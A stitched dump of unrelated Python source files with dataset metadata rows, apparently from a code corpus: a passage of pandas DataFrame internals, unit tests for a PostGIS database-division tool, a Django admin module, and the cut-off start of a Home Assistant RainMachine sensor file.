    return Series(picked, index=self._get_agg_axis(axis))
def idxmax(self, axis=0, skipna=True):
    """
    Return index of first occurrence of maximum over requested axis.
    NA/null values are excluded.

    Parameters
    ----------
    axis : {0 or 'index', 1 or 'columns'}, default 0
        0 or 'index' for row-wise, 1 or 'columns' for column-wise
    skipna : boolean, default True
        Exclude NA/null values. If an entire row/column is NA, the result
        will be NA.

    Raises
    ------
    ValueError
        * If the row/column is empty

    Returns
    -------
    idxmax : Series

    Notes
    -----
    This method is the DataFrame version of ``ndarray.argmax``.

    See Also
    --------
    Series.idxmax
    """
    axis = self._get_axis_number(axis)
    # Positional argmax per column (axis=0) or per row (axis=1); a
    # negative position marks an all-NA slice and maps to NaN below.
    positions = nanops.nanargmax(self.values, axis=axis, skipna=skipna)
    axis_labels = self._get_axis(axis)
    picked = [axis_labels[pos] if pos >= 0 else np.nan
              for pos in positions]
    return Series(picked, index=self._get_agg_axis(axis))
def _get_agg_axis(self, axis_num):
""" let's be explicit about this """
if axis_num == 0:
return self.columns
elif axis_num == 1:
return self.index
else:
raise ValueError('Axis must be 0 or 1 (got %r)' % axis_num)
def mode(self, axis=0, numeric_only=False):
    """
    Gets the mode(s) of each element along the axis selected. Adds a row
    for each mode per label, fills in gaps with nan.

    Note that there could be multiple values returned for the selected
    axis (when more than one item share the maximum frequency), which is
    the reason why a dataframe is returned. If you want to impute missing
    values with the mode in a dataframe ``df``, you can just do this:
    ``df.fillna(df.mode().iloc[0])``

    Parameters
    ----------
    axis : {0 or 'index', 1 or 'columns'}, default 0
        * 0 or 'index' : get mode of each column
        * 1 or 'columns' : get mode of each row
    numeric_only : boolean, default False
        if True, only apply to numeric columns

    Returns
    -------
    modes : DataFrame (sorted)

    Examples
    --------
    >>> df = pd.DataFrame({'A': [1, 2, 1, 2, 1, 2, 3]})
    >>> df.mode()
       A
    0  1
    1  2
    """
    frame = self._get_numeric_data() if numeric_only else self
    # Series.mode does the per-column (or per-row) work; apply stitches
    # the variable-length results together, padding gaps with NaN.
    return frame.apply(lambda ser: ser.mode(), axis=axis)
def quantile(self, q=0.5, axis=0, numeric_only=True,
             interpolation='linear'):
    """
    Return values at the given quantile over requested axis, a la
    numpy.percentile.
    Parameters
    ----------
    q : float or array-like, default 0.5 (50% quantile)
        0 <= q <= 1, the quantile(s) to compute
    axis : {0, 1, 'index', 'columns'} (default 0)
        0 or 'index' for row-wise, 1 or 'columns' for column-wise
    interpolation : {'linear', 'lower', 'higher', 'midpoint', 'nearest'}
        .. versionadded:: 0.18.0
        This optional parameter specifies the interpolation method to use,
        when the desired quantile lies between two data points `i` and `j`:
        * linear: `i + (j - i) * fraction`, where `fraction` is the
          fractional part of the index surrounded by `i` and `j`.
        * lower: `i`.
        * higher: `j`.
        * nearest: `i` or `j` whichever is nearest.
        * midpoint: (`i` + `j`) / 2.
    Returns
    -------
    quantiles : Series or DataFrame
        - If ``q`` is an array, a DataFrame will be returned where the
          index is ``q``, the columns are the columns of self, and the
          values are the quantiles.
        - If ``q`` is a float, a Series will be returned where the
          index is the columns of self and the values are the quantiles.
    Examples
    --------
    >>> df = pd.DataFrame(np.array([[1, 1], [2, 10], [3, 100], [4, 100]]),
                          columns=['a', 'b'])
    >>> df.quantile(.1)
    a    1.3
    b    3.7
    dtype: float64
    >>> df.quantile([.1, .5])
           a     b
    0.1  1.3   3.7
    0.5  2.5  55.0
    """
    self._check_percentile(q)
    data = self._get_numeric_data() if numeric_only else self
    axis = self._get_axis_number(axis)
    is_transposed = axis == 1
    if is_transposed:
        data = data.T
    # Block-wise quantile on the internal manager.
    # NOTE(review): ``transposed`` is forwarded to the BlockManager —
    # presumably so it can account for the .T above; confirm in internals.
    result = data._data.quantile(qs=q,
                                 axis=1,
                                 interpolation=interpolation,
                                 transposed=is_transposed)
    if result.ndim == 2:
        # list-like ``q`` -> DataFrame indexed by the quantiles
        result = self._constructor(result)
    else:
        # scalar ``q`` -> Series named after the quantile
        result = self._constructor_sliced(result, name=q)
    if is_transposed:
        result = result.T
    return result
def to_timestamp(self, freq=None, how='start', axis=0, copy=True):
    """
    Cast to DatetimeIndex of timestamps, at *beginning* of period
    Parameters
    ----------
    freq : string, default frequency of PeriodIndex
        Desired frequency
    how : {'s', 'e', 'start', 'end'}
        Convention for converting period to timestamp; start of period
        vs. end
    axis : {0 or 'index', 1 or 'columns'}, default 0
        The axis to convert (the index by default)
    copy : boolean, default True
        If false then underlying input data is not copied
    Returns
    -------
    df : DataFrame with DatetimeIndex
    """
    new_data = self._data
    if copy:
        new_data = new_data.copy()
    axis = self._get_axis_number(axis)
    # BlockManager axes are reversed relative to the DataFrame's, so
    # DataFrame axis 0 (index) is manager axis 1 and vice versa.
    if axis == 0:
        new_data.set_axis(1, self.index.to_timestamp(freq=freq, how=how))
    elif axis == 1:
        new_data.set_axis(0, self.columns.to_timestamp(freq=freq, how=how))
    else:  # pragma: no cover
        raise AssertionError('Axis must be 0 or 1. Got %s' % str(axis))
    return self._constructor(new_data)
def to_period(self, freq=None, axis=0, copy=True):
    """
    Convert DataFrame from DatetimeIndex to PeriodIndex with desired
    frequency (inferred from index if not passed)
    Parameters
    ----------
    freq : string, default
    axis : {0 or 'index', 1 or 'columns'}, default 0
        The axis to convert (the index by default)
    copy : boolean, default True
        If False then underlying input data is not copied
    Returns
    -------
    ts : TimeSeries with PeriodIndex
    """
    new_data = self._data
    if copy:
        new_data = new_data.copy()
    axis = self._get_axis_number(axis)
    # BlockManager axes are reversed relative to the DataFrame's, so
    # DataFrame axis 0 (index) is manager axis 1 and vice versa.
    if axis == 0:
        new_data.set_axis(1, self.index.to_period(freq=freq))
    elif axis == 1:
        new_data.set_axis(0, self.columns.to_period(freq=freq))
    else:  # pragma: no cover
        raise AssertionError('Axis must be 0 or 1. Got %s' % str(axis))
    return self._constructor(new_data)
def isin(self, values):
    """
    Return boolean DataFrame showing whether each element in the
    DataFrame is contained in values.
    Parameters
    ----------
    values : iterable, Series, DataFrame or dictionary
        The result will only be true at a location if all the
        labels match. If `values` is a Series, that's the index. If
        `values` is a dictionary, the keys must be the column names,
        which must match. If `values` is a DataFrame,
        then both the index and column labels must match.
    Returns
    -------
    DataFrame of booleans
    Examples
    --------
    When ``values`` is a list:
    >>> df = pd.DataFrame({'A': [1, 2, 3], 'B': ['a', 'b', 'f']})
    >>> df.isin([1, 3, 12, 'a'])
           A      B
    0   True   True
    1  False  False
    2   True  False
    When ``values`` is a dict:
    >>> df = pd.DataFrame({'A': [1, 2, 3], 'B': [1, 4, 7]})
    >>> df.isin({'A': [1, 3], 'B': [4, 7, 12]})
           A      B
    0   True  False  # Note that B didn't match the 1 here.
    1  False   True
    2   True   True
    When ``values`` is a Series or DataFrame:
    >>> df = pd.DataFrame({'A': [1, 2, 3], 'B': ['a', 'b', 'f']})
    >>> other = DataFrame({'A': [1, 3, 3, 2], 'B': ['e', 'f', 'f', 'e']})
    >>> df.isin(other)
           A      B
    0   True  False
    1  False  False  # Column A in `other` has a 3, but not at index 1.
    2   True   True
    """
    if isinstance(values, dict):
        # Per-column membership; columns absent from ``values`` default
        # to an empty list (always False) via the defaultdict.
        from pandas.core.reshape.concat import concat
        values = collections.defaultdict(list, values)
        return concat((self.iloc[:, [i]].isin(values[col])
                       for i, col in enumerate(self.columns)), axis=1)
    elif isinstance(values, Series):
        # Row-wise comparison aligned on the Series' index.
        if not values.index.is_unique:
            raise ValueError("cannot compute isin with "
                             "a duplicate axis.")
        return self.eq(values.reindex_like(self), axis='index')
    elif isinstance(values, DataFrame):
        # Element-wise comparison after aligning both axes.
        if not (values.columns.is_unique and values.index.is_unique):
            raise ValueError("cannot compute isin with "
                             "a duplicate axis.")
        return self.eq(values.reindex_like(self))
    else:
        if not is_list_like(values):
            raise TypeError("only list-like or dict-like objects are "
                            "allowed to be passed to DataFrame.isin(), "
                            "you passed a "
                            "{0!r}".format(type(values).__name__))
        # Flat membership test over the raveled values, reshaped back.
        return DataFrame(
            algorithms.isin(self.values.ravel(),
                            values).reshape(self.shape), self.index,
            self.columns)
# ----------------------------------------------------------------------
# Add plotting methods to DataFrame
# ``plot`` is wrapped in CachedAccessor so ``df.plot`` exposes the
# FramePlotMethods namespace; ``hist``/``boxplot`` are plain functions
# attached as attributes.
plot = CachedAccessor("plot", gfx.FramePlotMethods)
hist = gfx.hist_frame
boxplot = gfx.boxplot_frame
# Register the DataFrame axis metadata (note axes_are_reversed: the
# internal BlockManager stores columns as axis 0) and attach the
# generated arithmetic / statistical methods.
DataFrame._setup_axes(['index', 'columns'], info_axis=1, stat_axis=0,
                      axes_are_reversed=True, aliases={'rows': 0},
                      docs={
                          'index': 'The index (row labels) of the DataFrame.',
                          'columns': 'The column labels of the DataFrame.'})
DataFrame._add_numeric_operations()
DataFrame._add_series_or_dataframe_operations()
ops.add_flex_arithmetic_methods(DataFrame)
ops.add_special_arithmetic_methods(DataFrame)
def _arrays_to_mgr(arrays, arr_names, index, columns, dtype=None):
    """
    Segregate Series based on type and coerce into matrices.
    Needs to handle a lot of exceptional cases.
    """
    # figure out the index, if necessary
    if index is None:
        index = extract_index(arrays)
    else:
        index = _ensure_index(index)
    # don't force copy because getting jammed in an ndarray anyway
    arrays = _homogenize(arrays, index, dtype)
    # from BlockManager perspective
    # (manager axes are reversed: columns first, then index)
    axes = [_ensure_index(columns), _ensure_index(index)]
    return create_block_manager_from_arrays(arrays, arr_names, axes)
def extract_index(data):
    """Infer a result Index from a mix of Series/dicts/array-likes.

    Series and dict keys contribute their indexes (unioned); raw 1-d
    array-likes only contribute a length, which must be consistent.
    Raises ValueError on all-scalar input, mismatched lengths, or a
    dict/raw-array mix.
    """
    from pandas.core.index import _union_indexes
    index = None
    if len(data) == 0:
        index = Index([])
    elif len(data) > 0:
        raw_lengths = []
        indexes = []
        have_raw_arrays = False
        have_series = False
        have_dicts = False
        # classify each input: indexed (Series/dict) vs raw 1-d array
        for v in data:
            if isinstance(v, Series):
                have_series = True
                indexes.append(v.index)
            elif isinstance(v, dict):
                have_dicts = True
                indexes.append(list(v.keys()))
            elif is_list_like(v) and getattr(v, 'ndim', 1) == 1:
                have_raw_arrays = True
                raw_lengths.append(len(v))
        if not indexes and not raw_lengths:
            raise ValueError('If using all scalar values, you must pass'
                             ' an index')
        if have_series or have_dicts:
            index = _union_indexes(indexes)
        if have_raw_arrays:
            lengths = list(set(raw_lengths))
            if len(lengths) > 1:
                raise ValueError('arrays must all be same length')
            if have_dicts:
                raise ValueError('Mixing dicts with non-Series may lead to '
                                 'ambiguous ordering.')
            if have_series:
                # raw arrays must match the unioned Series index length
                if lengths[0] != len(index):
                    msg = ('array length %d does not match index length %d' %
                           (lengths[0], len(index)))
                    raise ValueError(msg)
            else:
                index = com._default_index(lengths[0])
    return _ensure_index(index)
def _prep_ndarray(values, copy=True):
if not isinstance(values, (np.ndarray, Series, Index)):
if len(values) == 0:
return np.empty((0, 0), dtype=object)
def convert(v):
return maybe_convert_platform(v)
# we could have a 1-dim or 2-dim list here
# this is equiv of np.asarray, but does object conversion
# and platform dtype preservation
try:
if is_list_like(values[0]) or hasattr(values[0], 'len'):
values = np.array([convert(v) for v in values])
else:
values = convert(values)
except:
values = convert(values)
else:
# drop subclass info, do not copy data
values = np.asarray(values)
if copy:
values = values.copy()
if values.ndim == 1:
values = values.reshape((values.shape[0], 1))
elif values.ndim != 2:
raise ValueError('Must pass 2-d input')
return values
def _to_arrays(data, columns, coerce_float=False, dtype=None):
    """
    Return list of arrays, columns
    """
    # Dispatch on the type of the first element: list/tuple rows,
    # dict rows, Series rows, Categorical, record array, or generic
    # iterable of rows.
    if isinstance(data, DataFrame):
        if columns is not None:
            # keep only the requested columns, in data's column order
            arrays = [data._ixs(i, axis=1).values
                      for i, col in enumerate(data.columns) if col in columns]
        else:
            columns = data.columns
            arrays = [data._ixs(i, axis=1).values for i in range(len(columns))]
        return arrays, columns
    if not len(data):
        # empty input: preserve record-array field names if present
        if isinstance(data, np.ndarray):
            columns = data.dtype.names
            if columns is not None:
                return [[]] * len(columns), columns
        return [], []  # columns if columns is not None else []
    if isinstance(data[0], (list, tuple)):
        return _list_to_arrays(data, columns, coerce_float=coerce_float,
                               dtype=dtype)
    # NOTE(review): collections.Mapping is the pre-3.3 alias; it was
    # removed in Python 3.10 (use collections.abc.Mapping).  Left as-is
    # here because this file still supports Python 2 via ``compat``.
    elif isinstance(data[0], collections.Mapping):
        return _list_of_dict_to_arrays(data, columns,
                                       coerce_float=coerce_float, dtype=dtype)
    elif isinstance(data[0], Series):
        return _list_of_series_to_arrays(data, columns,
                                         coerce_float=coerce_float,
                                         dtype=dtype)
    elif isinstance(data[0], Categorical):
        if columns is None:
            columns = com._default_index(len(data))
        return data, columns
    elif (isinstance(data, (np.ndarray, Series, Index)) and
          data.dtype.names is not None):
        # structured/record array: one array per named field
        columns = list(data.dtype.names)
        arrays = [data[k] for k in columns]
        return arrays, columns
    else:
        # last ditch effort
        data = lmap(tuple, data)
        return _list_to_arrays(data, columns, coerce_float=coerce_float,
                               dtype=dtype)
def _masked_rec_array_to_mgr(data, index, columns, dtype, copy):
    """ extract from a masked rec array and create the manager

    Converts a ``numpy.ma`` masked record array into a BlockManager by
    processing the underlying record array and then writing each field's
    fill value into its masked positions.
    """

    # essentially process a record array then fill it
    fill_value = data.fill_value
    fdata = ma.getdata(data)
    if index is None:
        index = _get_names_from_index(fdata)
        if index is None:
            index = com._default_index(len(data))
    index = _ensure_index(index)

    if columns is not None:
        columns = _ensure_index(columns)
    arrays, arr_columns = _to_arrays(fdata, columns)

    # fill if needed: replace masked entries with each field's fill value,
    # upcasting the array first so the fill value fits.
    new_arrays = []
    for fv, arr, col in zip(fill_value, arrays, arr_columns):
        mask = ma.getmaskarray(data[col])
        if mask.any():
            arr, fv = maybe_upcast(arr, fill_value=fv, copy=True)
            arr[mask] = fv
        new_arrays.append(arr)

    # create the manager
    arrays, arr_columns = _reorder_arrays(new_arrays, arr_columns, columns)
    if columns is None:
        columns = arr_columns

    mgr = _arrays_to_mgr(arrays, arr_columns, index, columns)

    if copy:
        mgr = mgr.copy()
    return mgr
def _reorder_arrays(arrays, arr_columns, columns):
    """Reorder ``arrays``/``arr_columns`` to match the order of ``columns``.

    When either column collection is missing or empty, the inputs are
    returned unchanged.
    """
    have_target = columns is not None and len(columns)
    have_source = arr_columns is not None and len(arr_columns)
    if not (have_target and have_source):
        return arrays, arr_columns

    indexer = _ensure_index(arr_columns).get_indexer(columns)
    reordered_columns = _ensure_index([arr_columns[i] for i in indexer])
    reordered_arrays = [arrays[i] for i in indexer]
    return reordered_arrays, reordered_columns
def _list_to_arrays(data, columns, coerce_float=False, dtype=None):
    """Convert a list of row tuples/lists into per-column object arrays."""
    # Tuples and lists go through different object-array converters.
    if len(data) > 0 and isinstance(data[0], tuple):
        rows = lib.to_object_array_tuples(data)
    else:
        # list of lists
        rows = lib.to_object_array(data)
    content = list(rows.T)
    return _convert_object_array(content, columns, dtype=dtype,
                                 coerce_float=coerce_float)
def _list_of_series_to_arrays(data, columns, coerce_float=False, dtype=None):
    """Align a list of Series to a common set of columns and stack them.

    Each Series is reindexed (via a cached indexer) onto ``columns``; the
    aligned values are stacked row-wise.  Object-dtype results are routed
    through the soft-conversion path.
    """
    from pandas.core.index import _get_objs_combined_axis

    if columns is None:
        columns = _get_objs_combined_axis(data)

    # Series sharing the same index object get the same indexer; cache by
    # the index's id() to avoid recomputing get_indexer per row.
    indexer_cache = {}

    aligned_values = []
    for s in data:
        index = getattr(s, 'index', None)
        if index is None:
            index = com._default_index(len(s))

        if id(index) in indexer_cache:
            indexer = indexer_cache[id(index)]
        else:
            indexer = indexer_cache[id(index)] = index.get_indexer(columns)

        values = com._values_from_object(s)
        aligned_values.append(algorithms.take_1d(values, indexer))

    values = np.vstack(aligned_values)

    if values.dtype == np.object_:
        # Object dtype: attempt type inference column by column.
        content = list(values.T)
        return _convert_object_array(content, columns, dtype=dtype,
                                     coerce_float=coerce_float)
    else:
        return values.T, columns
def _list_of_dict_to_arrays(data, columns, coerce_float=False, dtype=None):
    """Convert a list of dicts (one per row) to per-column arrays.

    Parameters
    ----------
    data : list of dict
    columns : sequence or None
        If None, the union of all keys is used; the keys are sorted unless
        any of the dicts is an OrderedDict, in which case insertion order
        is preserved.
    coerce_float : bool, default False
    dtype : dtype or None

    Returns
    -------
    tuple of (arrays, columns)
    """
    if columns is None:
        gen = (list(x.keys()) for x in data)
        sort = not any(isinstance(d, OrderedDict) for d in data)
        columns = lib.fast_unique_multiple_list_gen(gen, sort=sort)

    # assure that they are of the base dict class and not of derived
    # classes.  (Replaces the fragile ``x and a or b`` idiom with an
    # explicit conditional expression; behavior is unchanged, since for
    # an empty dict the fallback ``dict(d)`` is equal to ``d``.)
    data = [d if type(d) is dict else dict(d) for d in data]

    content = list(lib.dicts_to_array(data, list(columns)).T)
    return _convert_object_array(content, columns, dtype=dtype,
                                 coerce_float=coerce_float)
def _convert_object_array(content, columns, coerce_float=False, dtype=None):
    """Soft-convert a list of object arrays and pair them with columns.

    Parameters
    ----------
    content : list of 1-d object ndarrays, one per column
    columns : sequence or None
        Generated as a default RangeIndex-style index when None; otherwise
        its length must match ``content``.
    coerce_float : bool, default False
        Try converting object values to float during inference.
    dtype : dtype or None
        When an explicit non-object dtype is requested, inference is
        skipped in favor of the datetime cast below.

    Raises
    ------
    AssertionError
        If ``columns`` is given but its length differs from ``content``.
    """
    if columns is None:
        columns = com._default_index(len(content))
    else:
        if len(columns) != len(content):  # pragma: no cover
            # caller's responsibility to check for this...
            raise AssertionError('%d columns passed, passed data had %s '
                                 'columns' % (len(columns), len(content)))

    # provide soft conversion of object dtypes
    def convert(arr):
        if dtype != object and dtype != np.object:
            arr = lib.maybe_convert_objects(arr, try_float=coerce_float)
            arr = maybe_cast_to_datetime(arr, dtype)
        return arr

    arrays = [convert(arr) for arr in content]

    return arrays, columns
def _get_names_from_index(data):
    """Build an index from the ``name`` attributes of a sequence of Series.

    Returns a default integer index when no element is named; otherwise
    unnamed elements are labelled ``'Unnamed %d'`` with a running counter.
    """
    if all(getattr(s, 'name', None) is None for s in data):
        return com._default_index(len(data))

    index = lrange(len(data))
    unnamed = 0
    for position, series in enumerate(data):
        name = getattr(series, 'name', None)
        if name is None:
            index[position] = 'Unnamed %d' % unnamed
            unnamed += 1
        else:
            index[position] = name

    return index
def _homogenize(data, index, dtype=None):
    """Align every column-like in ``data`` to ``index`` and sanitize it.

    Series are (optionally) cast to ``dtype`` and reindexed; dicts are
    looked up against the index; everything else is passed straight to
    ``_sanitize_array``.  Returns the list of homogenized arrays.
    """
    from pandas.core.series import _sanitize_array

    # Lazily-built object-dtype view of the index, shared by all dict rows.
    oindex = None
    homogenized = []

    for v in data:
        if isinstance(v, Series):
            if dtype is not None:
                v = v.astype(dtype)
            if v.index is not index:
                # Forces alignment. No need to copy data since we
                # are putting it into an ndarray later
                v = v.reindex(index, copy=False)
        else:
            if isinstance(v, dict):
                if oindex is None:
                    oindex = index.astype('O')

                if isinstance(index, (DatetimeIndex, TimedeltaIndex)):
                    # Normalize datetime-like keys so lookups match.
                    v = com._dict_compat(v)
                else:
                    v = dict(v)
                v = lib.fast_multiget(v, oindex.values, default=np.nan)
            v = _sanitize_array(v, index, dtype=dtype, copy=False,
                                raise_cast_failure=False)

        homogenized.append(v)

    return homogenized
def _from_nested_dict(data):
    """Invert a dict of dicts: {row: {col: v}} -> {col: {row: v}}."""
    # TODO: this should be seriously cythonized
    inverted = OrderedDict()
    for row_key, row in compat.iteritems(data):
        for col_key, value in compat.iteritems(row):
            inverted.setdefault(col_key, OrderedDict())[row_key] = value
    return inverted
def _put_str(s, space):
return ('%s' % s)[:space].ljust(space)
| 36.400185 | 85 | 0.532237 |
ace975af5dcfcbe1bb195bd607db5f110a522925 | 7,335 | py | Python | tests/db_division_tests/db_division_test.py | cabesuon/ideuy_controls | 508217725ffd4993d574acec6ea9d80c0401591a | [
"MIT"
] | null | null | null | tests/db_division_tests/db_division_test.py | cabesuon/ideuy_controls | 508217725ffd4993d574acec6ea9d80c0401591a | [
"MIT"
] | null | null | null | tests/db_division_tests/db_division_test.py | cabesuon/ideuy_controls | 508217725ffd4993d574acec6ea9d80c0401591a | [
"MIT"
] | null | null | null | """Module that contains the unit tests for division_bd.py.
Examples:
$python -m unittest db_division_test.py
"""
import unittest
import sys
import os
# add top level package to path
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
from controls.db_division.main import ( # pylint: disable=import-error, C0413
db_connect, create_consignments_table, convert_consignments_srid, get_consignments,
create_schema, get_tables_from_original_schema, create_table, load_data
)
class TestDividisionBD(unittest.TestCase):
    """Unit tests for the db_division module.

    Requires a reachable PostgreSQL/PostGIS instance populated with the
    'cartografia_nacional_hidrografia' fixture schema.

    Attributes:
        host: database host
        port: database port
        db: database name
        user: database user
        password: database password
    """

    # Name of the fixture schema every test reads from.
    ORIGINAL_SCHEMA = 'cartografia_nacional_hidrografia'

    def setUp(self):
        """Unit test setup."""
        self.host = 'localhost'
        self.port = 5432
        self.db = 'test_db_division'
        self.user = 'test_user'
        self.password = 'test_password'

    def _connect(self):
        """Open a fresh connection to the test database."""
        return db_connect(self.host, self.port, self.db, self.user, self.password)

    @staticmethod
    def _sql_file_path():
        """Absolute path of the Remesa_Nacional.sql fixture shipped with the package."""
        return os.path.join(
            os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))),
            'controls', 'db_division', 'files', 'Remesa_Nacional.sql')

    def _setup_consignments(self, c):
        """Create public.remesa_nacional from the fixture; return the schema's tables."""
        tables_all = get_tables_from_original_schema(c, self.ORIGINAL_SCHEMA)
        create_consignments_table(c, 'public', 'remesa_nacional',
                                  self._sql_file_path(), self.ORIGINAL_SCHEMA,
                                  tables_all)
        return tables_all

    def test_db_connect(self):
        """Unit test of db_connect function."""
        conn = self._connect()
        self.assertIsNotNone(conn)
        with conn.cursor() as c:
            self.assertIsNotNone(c)

    def test_get_tables_from_original_schema(self):
        """Unit test of get_tables_from_original_schema function."""
        conn = self._connect()
        with conn.cursor() as c:
            tables_all = get_tables_from_original_schema(c, self.ORIGINAL_SCHEMA)
            self.assertEqual(tables_all, [('agua_a', ), ('agua_estancada_desconocida_a', ),
                                          ('area_humeda_a', )])

    def test_create_consignments_table(self):
        """Unit test of create_consignments_table procedure."""
        conn = self._connect()
        with conn.cursor() as c:
            self._setup_consignments(c)
            c.execute('SELECT COUNT(*) FROM public.remesa_nacional;')
            rows = c.fetchall()
            self.assertEqual(len(rows), 1)
            self.assertEqual(rows[0][0], 12)

    def test_get_consignments(self):
        """Unit test of get_consignments function."""
        conn = self._connect()
        with conn.cursor() as c:
            self._setup_consignments(c)
            consignments = get_consignments(c, 'public', 'remesa_nacional')
            self.assertEqual(len(consignments), 12)

    def test_convert_consignments_srid(self):
        """Unit test of convert_consignments_srid procedure."""
        conn = self._connect()
        with conn.cursor() as c:
            tables_all = self._setup_consignments(c)
            # change SRID to 5381 so the conversion has something to do
            c.execute('ALTER TABLE public.remesa_nacional '
                      'ALTER COLUMN geom TYPE geometry(MultiPolygon, 5381) '
                      'USING ST_Transform(geom, 5381);')
            # checking if SRID was correctly changed
            c.execute("SELECT Find_SRID('public', 'remesa_nacional', 'geom');")
            rows = c.fetchall()
            self.assertEqual(len(rows), 1)
            self.assertEqual(rows[0][0], 5381)
            # convert SRID back and check
            convert_consignments_srid(c, 'public', 'remesa_nacional',
                                      self.ORIGINAL_SCHEMA, tables_all)
            c.execute("SELECT Find_SRID('public', 'remesa_nacional', 'geom');")
            rows = c.fetchall()
            self.assertEqual(len(rows), 1)
            self.assertEqual(rows[0][0], 31981)

    def test_create_schema(self):
        """Unit test of create_schema function."""
        conn = self._connect()
        with conn.cursor() as c:
            # delete schema if exists so the test is repeatable
            c.execute('DROP SCHEMA IF EXISTS rn01 CASCADE')
            # create new schema for consignment id = 1 (-> rn01)
            consignment_id = 1
            schema_new = create_schema(c, 'public', 'rn', consignment_id)
            c.execute("SELECT COUNT(schema_name) FROM information_schema.schemata "
                      "WHERE schema_name = '" + schema_new + "'")
            rows = c.fetchall()
            self.assertEqual(len(rows), 1)
            self.assertEqual(rows[0][0], 1)

    def test_create_table(self):
        """Unit test of create_table procedure."""
        conn = self._connect()
        with conn.cursor() as c:
            table_original = 'cartografia_nacional_hidrografia.agua_estancada_desconocida_a'
            table_new = 'rn01.agua_estancada_desconocida_a'
            create_table(c, table_original, table_new)
            c.execute("SELECT COUNT(*) FROM information_schema.tables "
                      "WHERE table_schema = 'rn01' "
                      "AND table_name = 'agua_estancada_desconocida_a'")
            rows = c.fetchall()
            self.assertEqual(len(rows), 1)
            self.assertEqual(rows[0][0], 1)

    def test_load_data(self):
        """Unit test of load_data procedure."""
        conn = self._connect()
        with conn.cursor() as c:
            consignment_id = 1
            table_name = 'agua_estancada_desconocida_a'
            table_original = 'cartografia_nacional_hidrografia.agua_estancada_desconocida_a'
            table_new = 'rn01.agua_estancada_desconocida_a'
            load_data(c, 'public', 'remesa_nacional', consignment_id,
                      table_name, table_original, table_new)
            c.execute("SELECT COUNT(*) FROM rn01.agua_estancada_desconocida_a")
            rows = c.fetchall()
            self.assertEqual(len(rows), 1)
            self.assertEqual(rows[0][0], 4455)
# Allow running this test module directly: `python db_division_test.py`.
if __name__ == "__main__":
    unittest.main()
| 49.228188 | 173 | 0.650307 |
ace977ad3a276845b4b652cfd30d602be0635d6a | 3,088 | py | Python | faravdms/vdms/admin.py | samcodesio/faravdms_active | cab6e8973db074c287da97afbfe739e23e4b1f35 | [
"Apache-2.0"
] | null | null | null | faravdms/vdms/admin.py | samcodesio/faravdms_active | cab6e8973db074c287da97afbfe739e23e4b1f35 | [
"Apache-2.0"
] | null | null | null | faravdms/vdms/admin.py | samcodesio/faravdms_active | cab6e8973db074c287da97afbfe739e23e4b1f35 | [
"Apache-2.0"
] | 1 | 2021-12-21T16:39:20.000Z | 2021-12-21T16:39:20.000Z |
from django.contrib import admin
from .models import Category, ProviderInfo, Certificates, SubCategory, SendEmail, Consultant
from django.core.exceptions import ValidationError
from django import forms
from django.db.models.signals import m2m_changed
from import_export.admin import ImportExportModelAdmin
from .resources import *
from import_export import resources
# # Register your models here.
# admin.site.register(Goods)
# admin.site.register(Consultancy)
# admin.site.register(Nonconsultancy)
# Models that only need the stock admin interface.
admin.site.register(Category)
admin.site.register(SubCategory)
# ProviderInfo is registered below via @admin.register with import/export support.
admin.site.register(Certificates)
admin.site.register(SendEmail)
admin.site.register(Consultant)
# admin.site.register(User)
# class ProviderForm(forms.ModelForm):
# model = ProviderInfo
# def clean(self):
# cleaned_data = super().clean()
# if cleaned_data.get('category').count() >= 3:
# raise ValidationError('You can only choose 2 categories for the field Category!')
# @admin.register(ProviderInfo)
# class QuestionAdmin(admin.ModelAdmin):
# form = ProviderForm
# def category_changed(sender, **kwargs):
# if kwargs['instance'].category.count() > 3:
# raise ValidationError("You can't assign more than two categories")
# m2m_changed.connect(category_changed, sender=ProviderInfo.category.through)
# from django import forms
# class ProvidersResource(resources.ModelResource):
# category = fields.Field(
# attribute = 'category',
# widget = widgets.ManyToManyWidget(Category, field='category_name',seperator='|')
# )
# class meta:
# model = ProviderInfo
@admin.register(ProviderInfo)
class ProviderAdmin(ImportExportModelAdmin):
    """Admin for ProviderInfo with import/export support.

    ``list_display`` referenced ``get_categories``/``get_subcategories``
    while those methods were commented out, which makes Django's admin
    checks fail (admin.E108); they are restored here as admin display
    methods operating on the model instance.
    """
    resource_class = ProvidersResource
    fields = ['category', 'no_of_categories', 'sub_categories', 'company_name', 'postal_address', 'email_address',
              'altemail_address', 'contact', 'altcontact', 'country', 'local_area', 'type_of_firm', 'date_of_registration', 'classification']
    list_display = ['get_categories', 'no_of_categories', 'get_subcategories', 'company_name', 'postal_address', 'email_address',
                    'altemail_address', 'contact', 'altcontact', 'country', 'local_area', 'type_of_firm', 'date_of_registration', 'classification']

    def get_categories(self, obj):
        """Newline-joined category names of the provider's M2M categories."""
        return "\n".join(b.category_name for b in obj.category.all())
    get_categories.short_description = 'Categories'

    def get_subcategories(self, obj):
        """Newline-joined names of the provider's M2M sub-categories."""
        return "\n".join(s.sub_category_name for s in obj.sub_categories.all())
    get_subcategories.short_description = 'Sub categories'
# def get_categories(self):
# return "\n".join([b.category_name for b in self.category.all()])
# def get_subcategories(self):
# return "\n".join([s.sub_category_name for s in self.sub_categories.all()])
# admin.site.register(ProviderInfo, ProviderAdmin)
# Working
# @admin.register(Category)
# class CategoryAdmin(ImportExportModelAdmin):
# resource_class = ProvidersResource
# # fields = ['id','get_categories', 'no_of_categories', 'get_subcategories', 'company_name', 'postal_address', 'email_address',
# # 'altemail_address', 'contact', 'altcontact', 'country', 'local_area', 'type_of_firm', 'date_of_registration','classification']
# list_display = ('category_name', 'category_code', 'category_description',)
| 36.761905 | 151 | 0.723446 |
ace977ca35661ce9e1394db4c4face6c9cf74c7a | 5,641 | py | Python | homeassistant/components/rainmachine/binary_sensor.py | dnguyen800/home-assistant | 353a0144960dcb7c4f6b81459f76937ce078c1a8 | [
"Apache-2.0"
] | null | null | null | homeassistant/components/rainmachine/binary_sensor.py | dnguyen800/home-assistant | 353a0144960dcb7c4f6b81459f76937ce078c1a8 | [
"Apache-2.0"
] | null | null | null | homeassistant/components/rainmachine/binary_sensor.py | dnguyen800/home-assistant | 353a0144960dcb7c4f6b81459f76937ce078c1a8 | [
"Apache-2.0"
] | null | null | null | """This platform provides binary sensors for key RainMachine data."""
import logging
from homeassistant.components.binary_sensor import BinarySensorDevice
from homeassistant.core import callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from . import (
DATA_CLIENT,
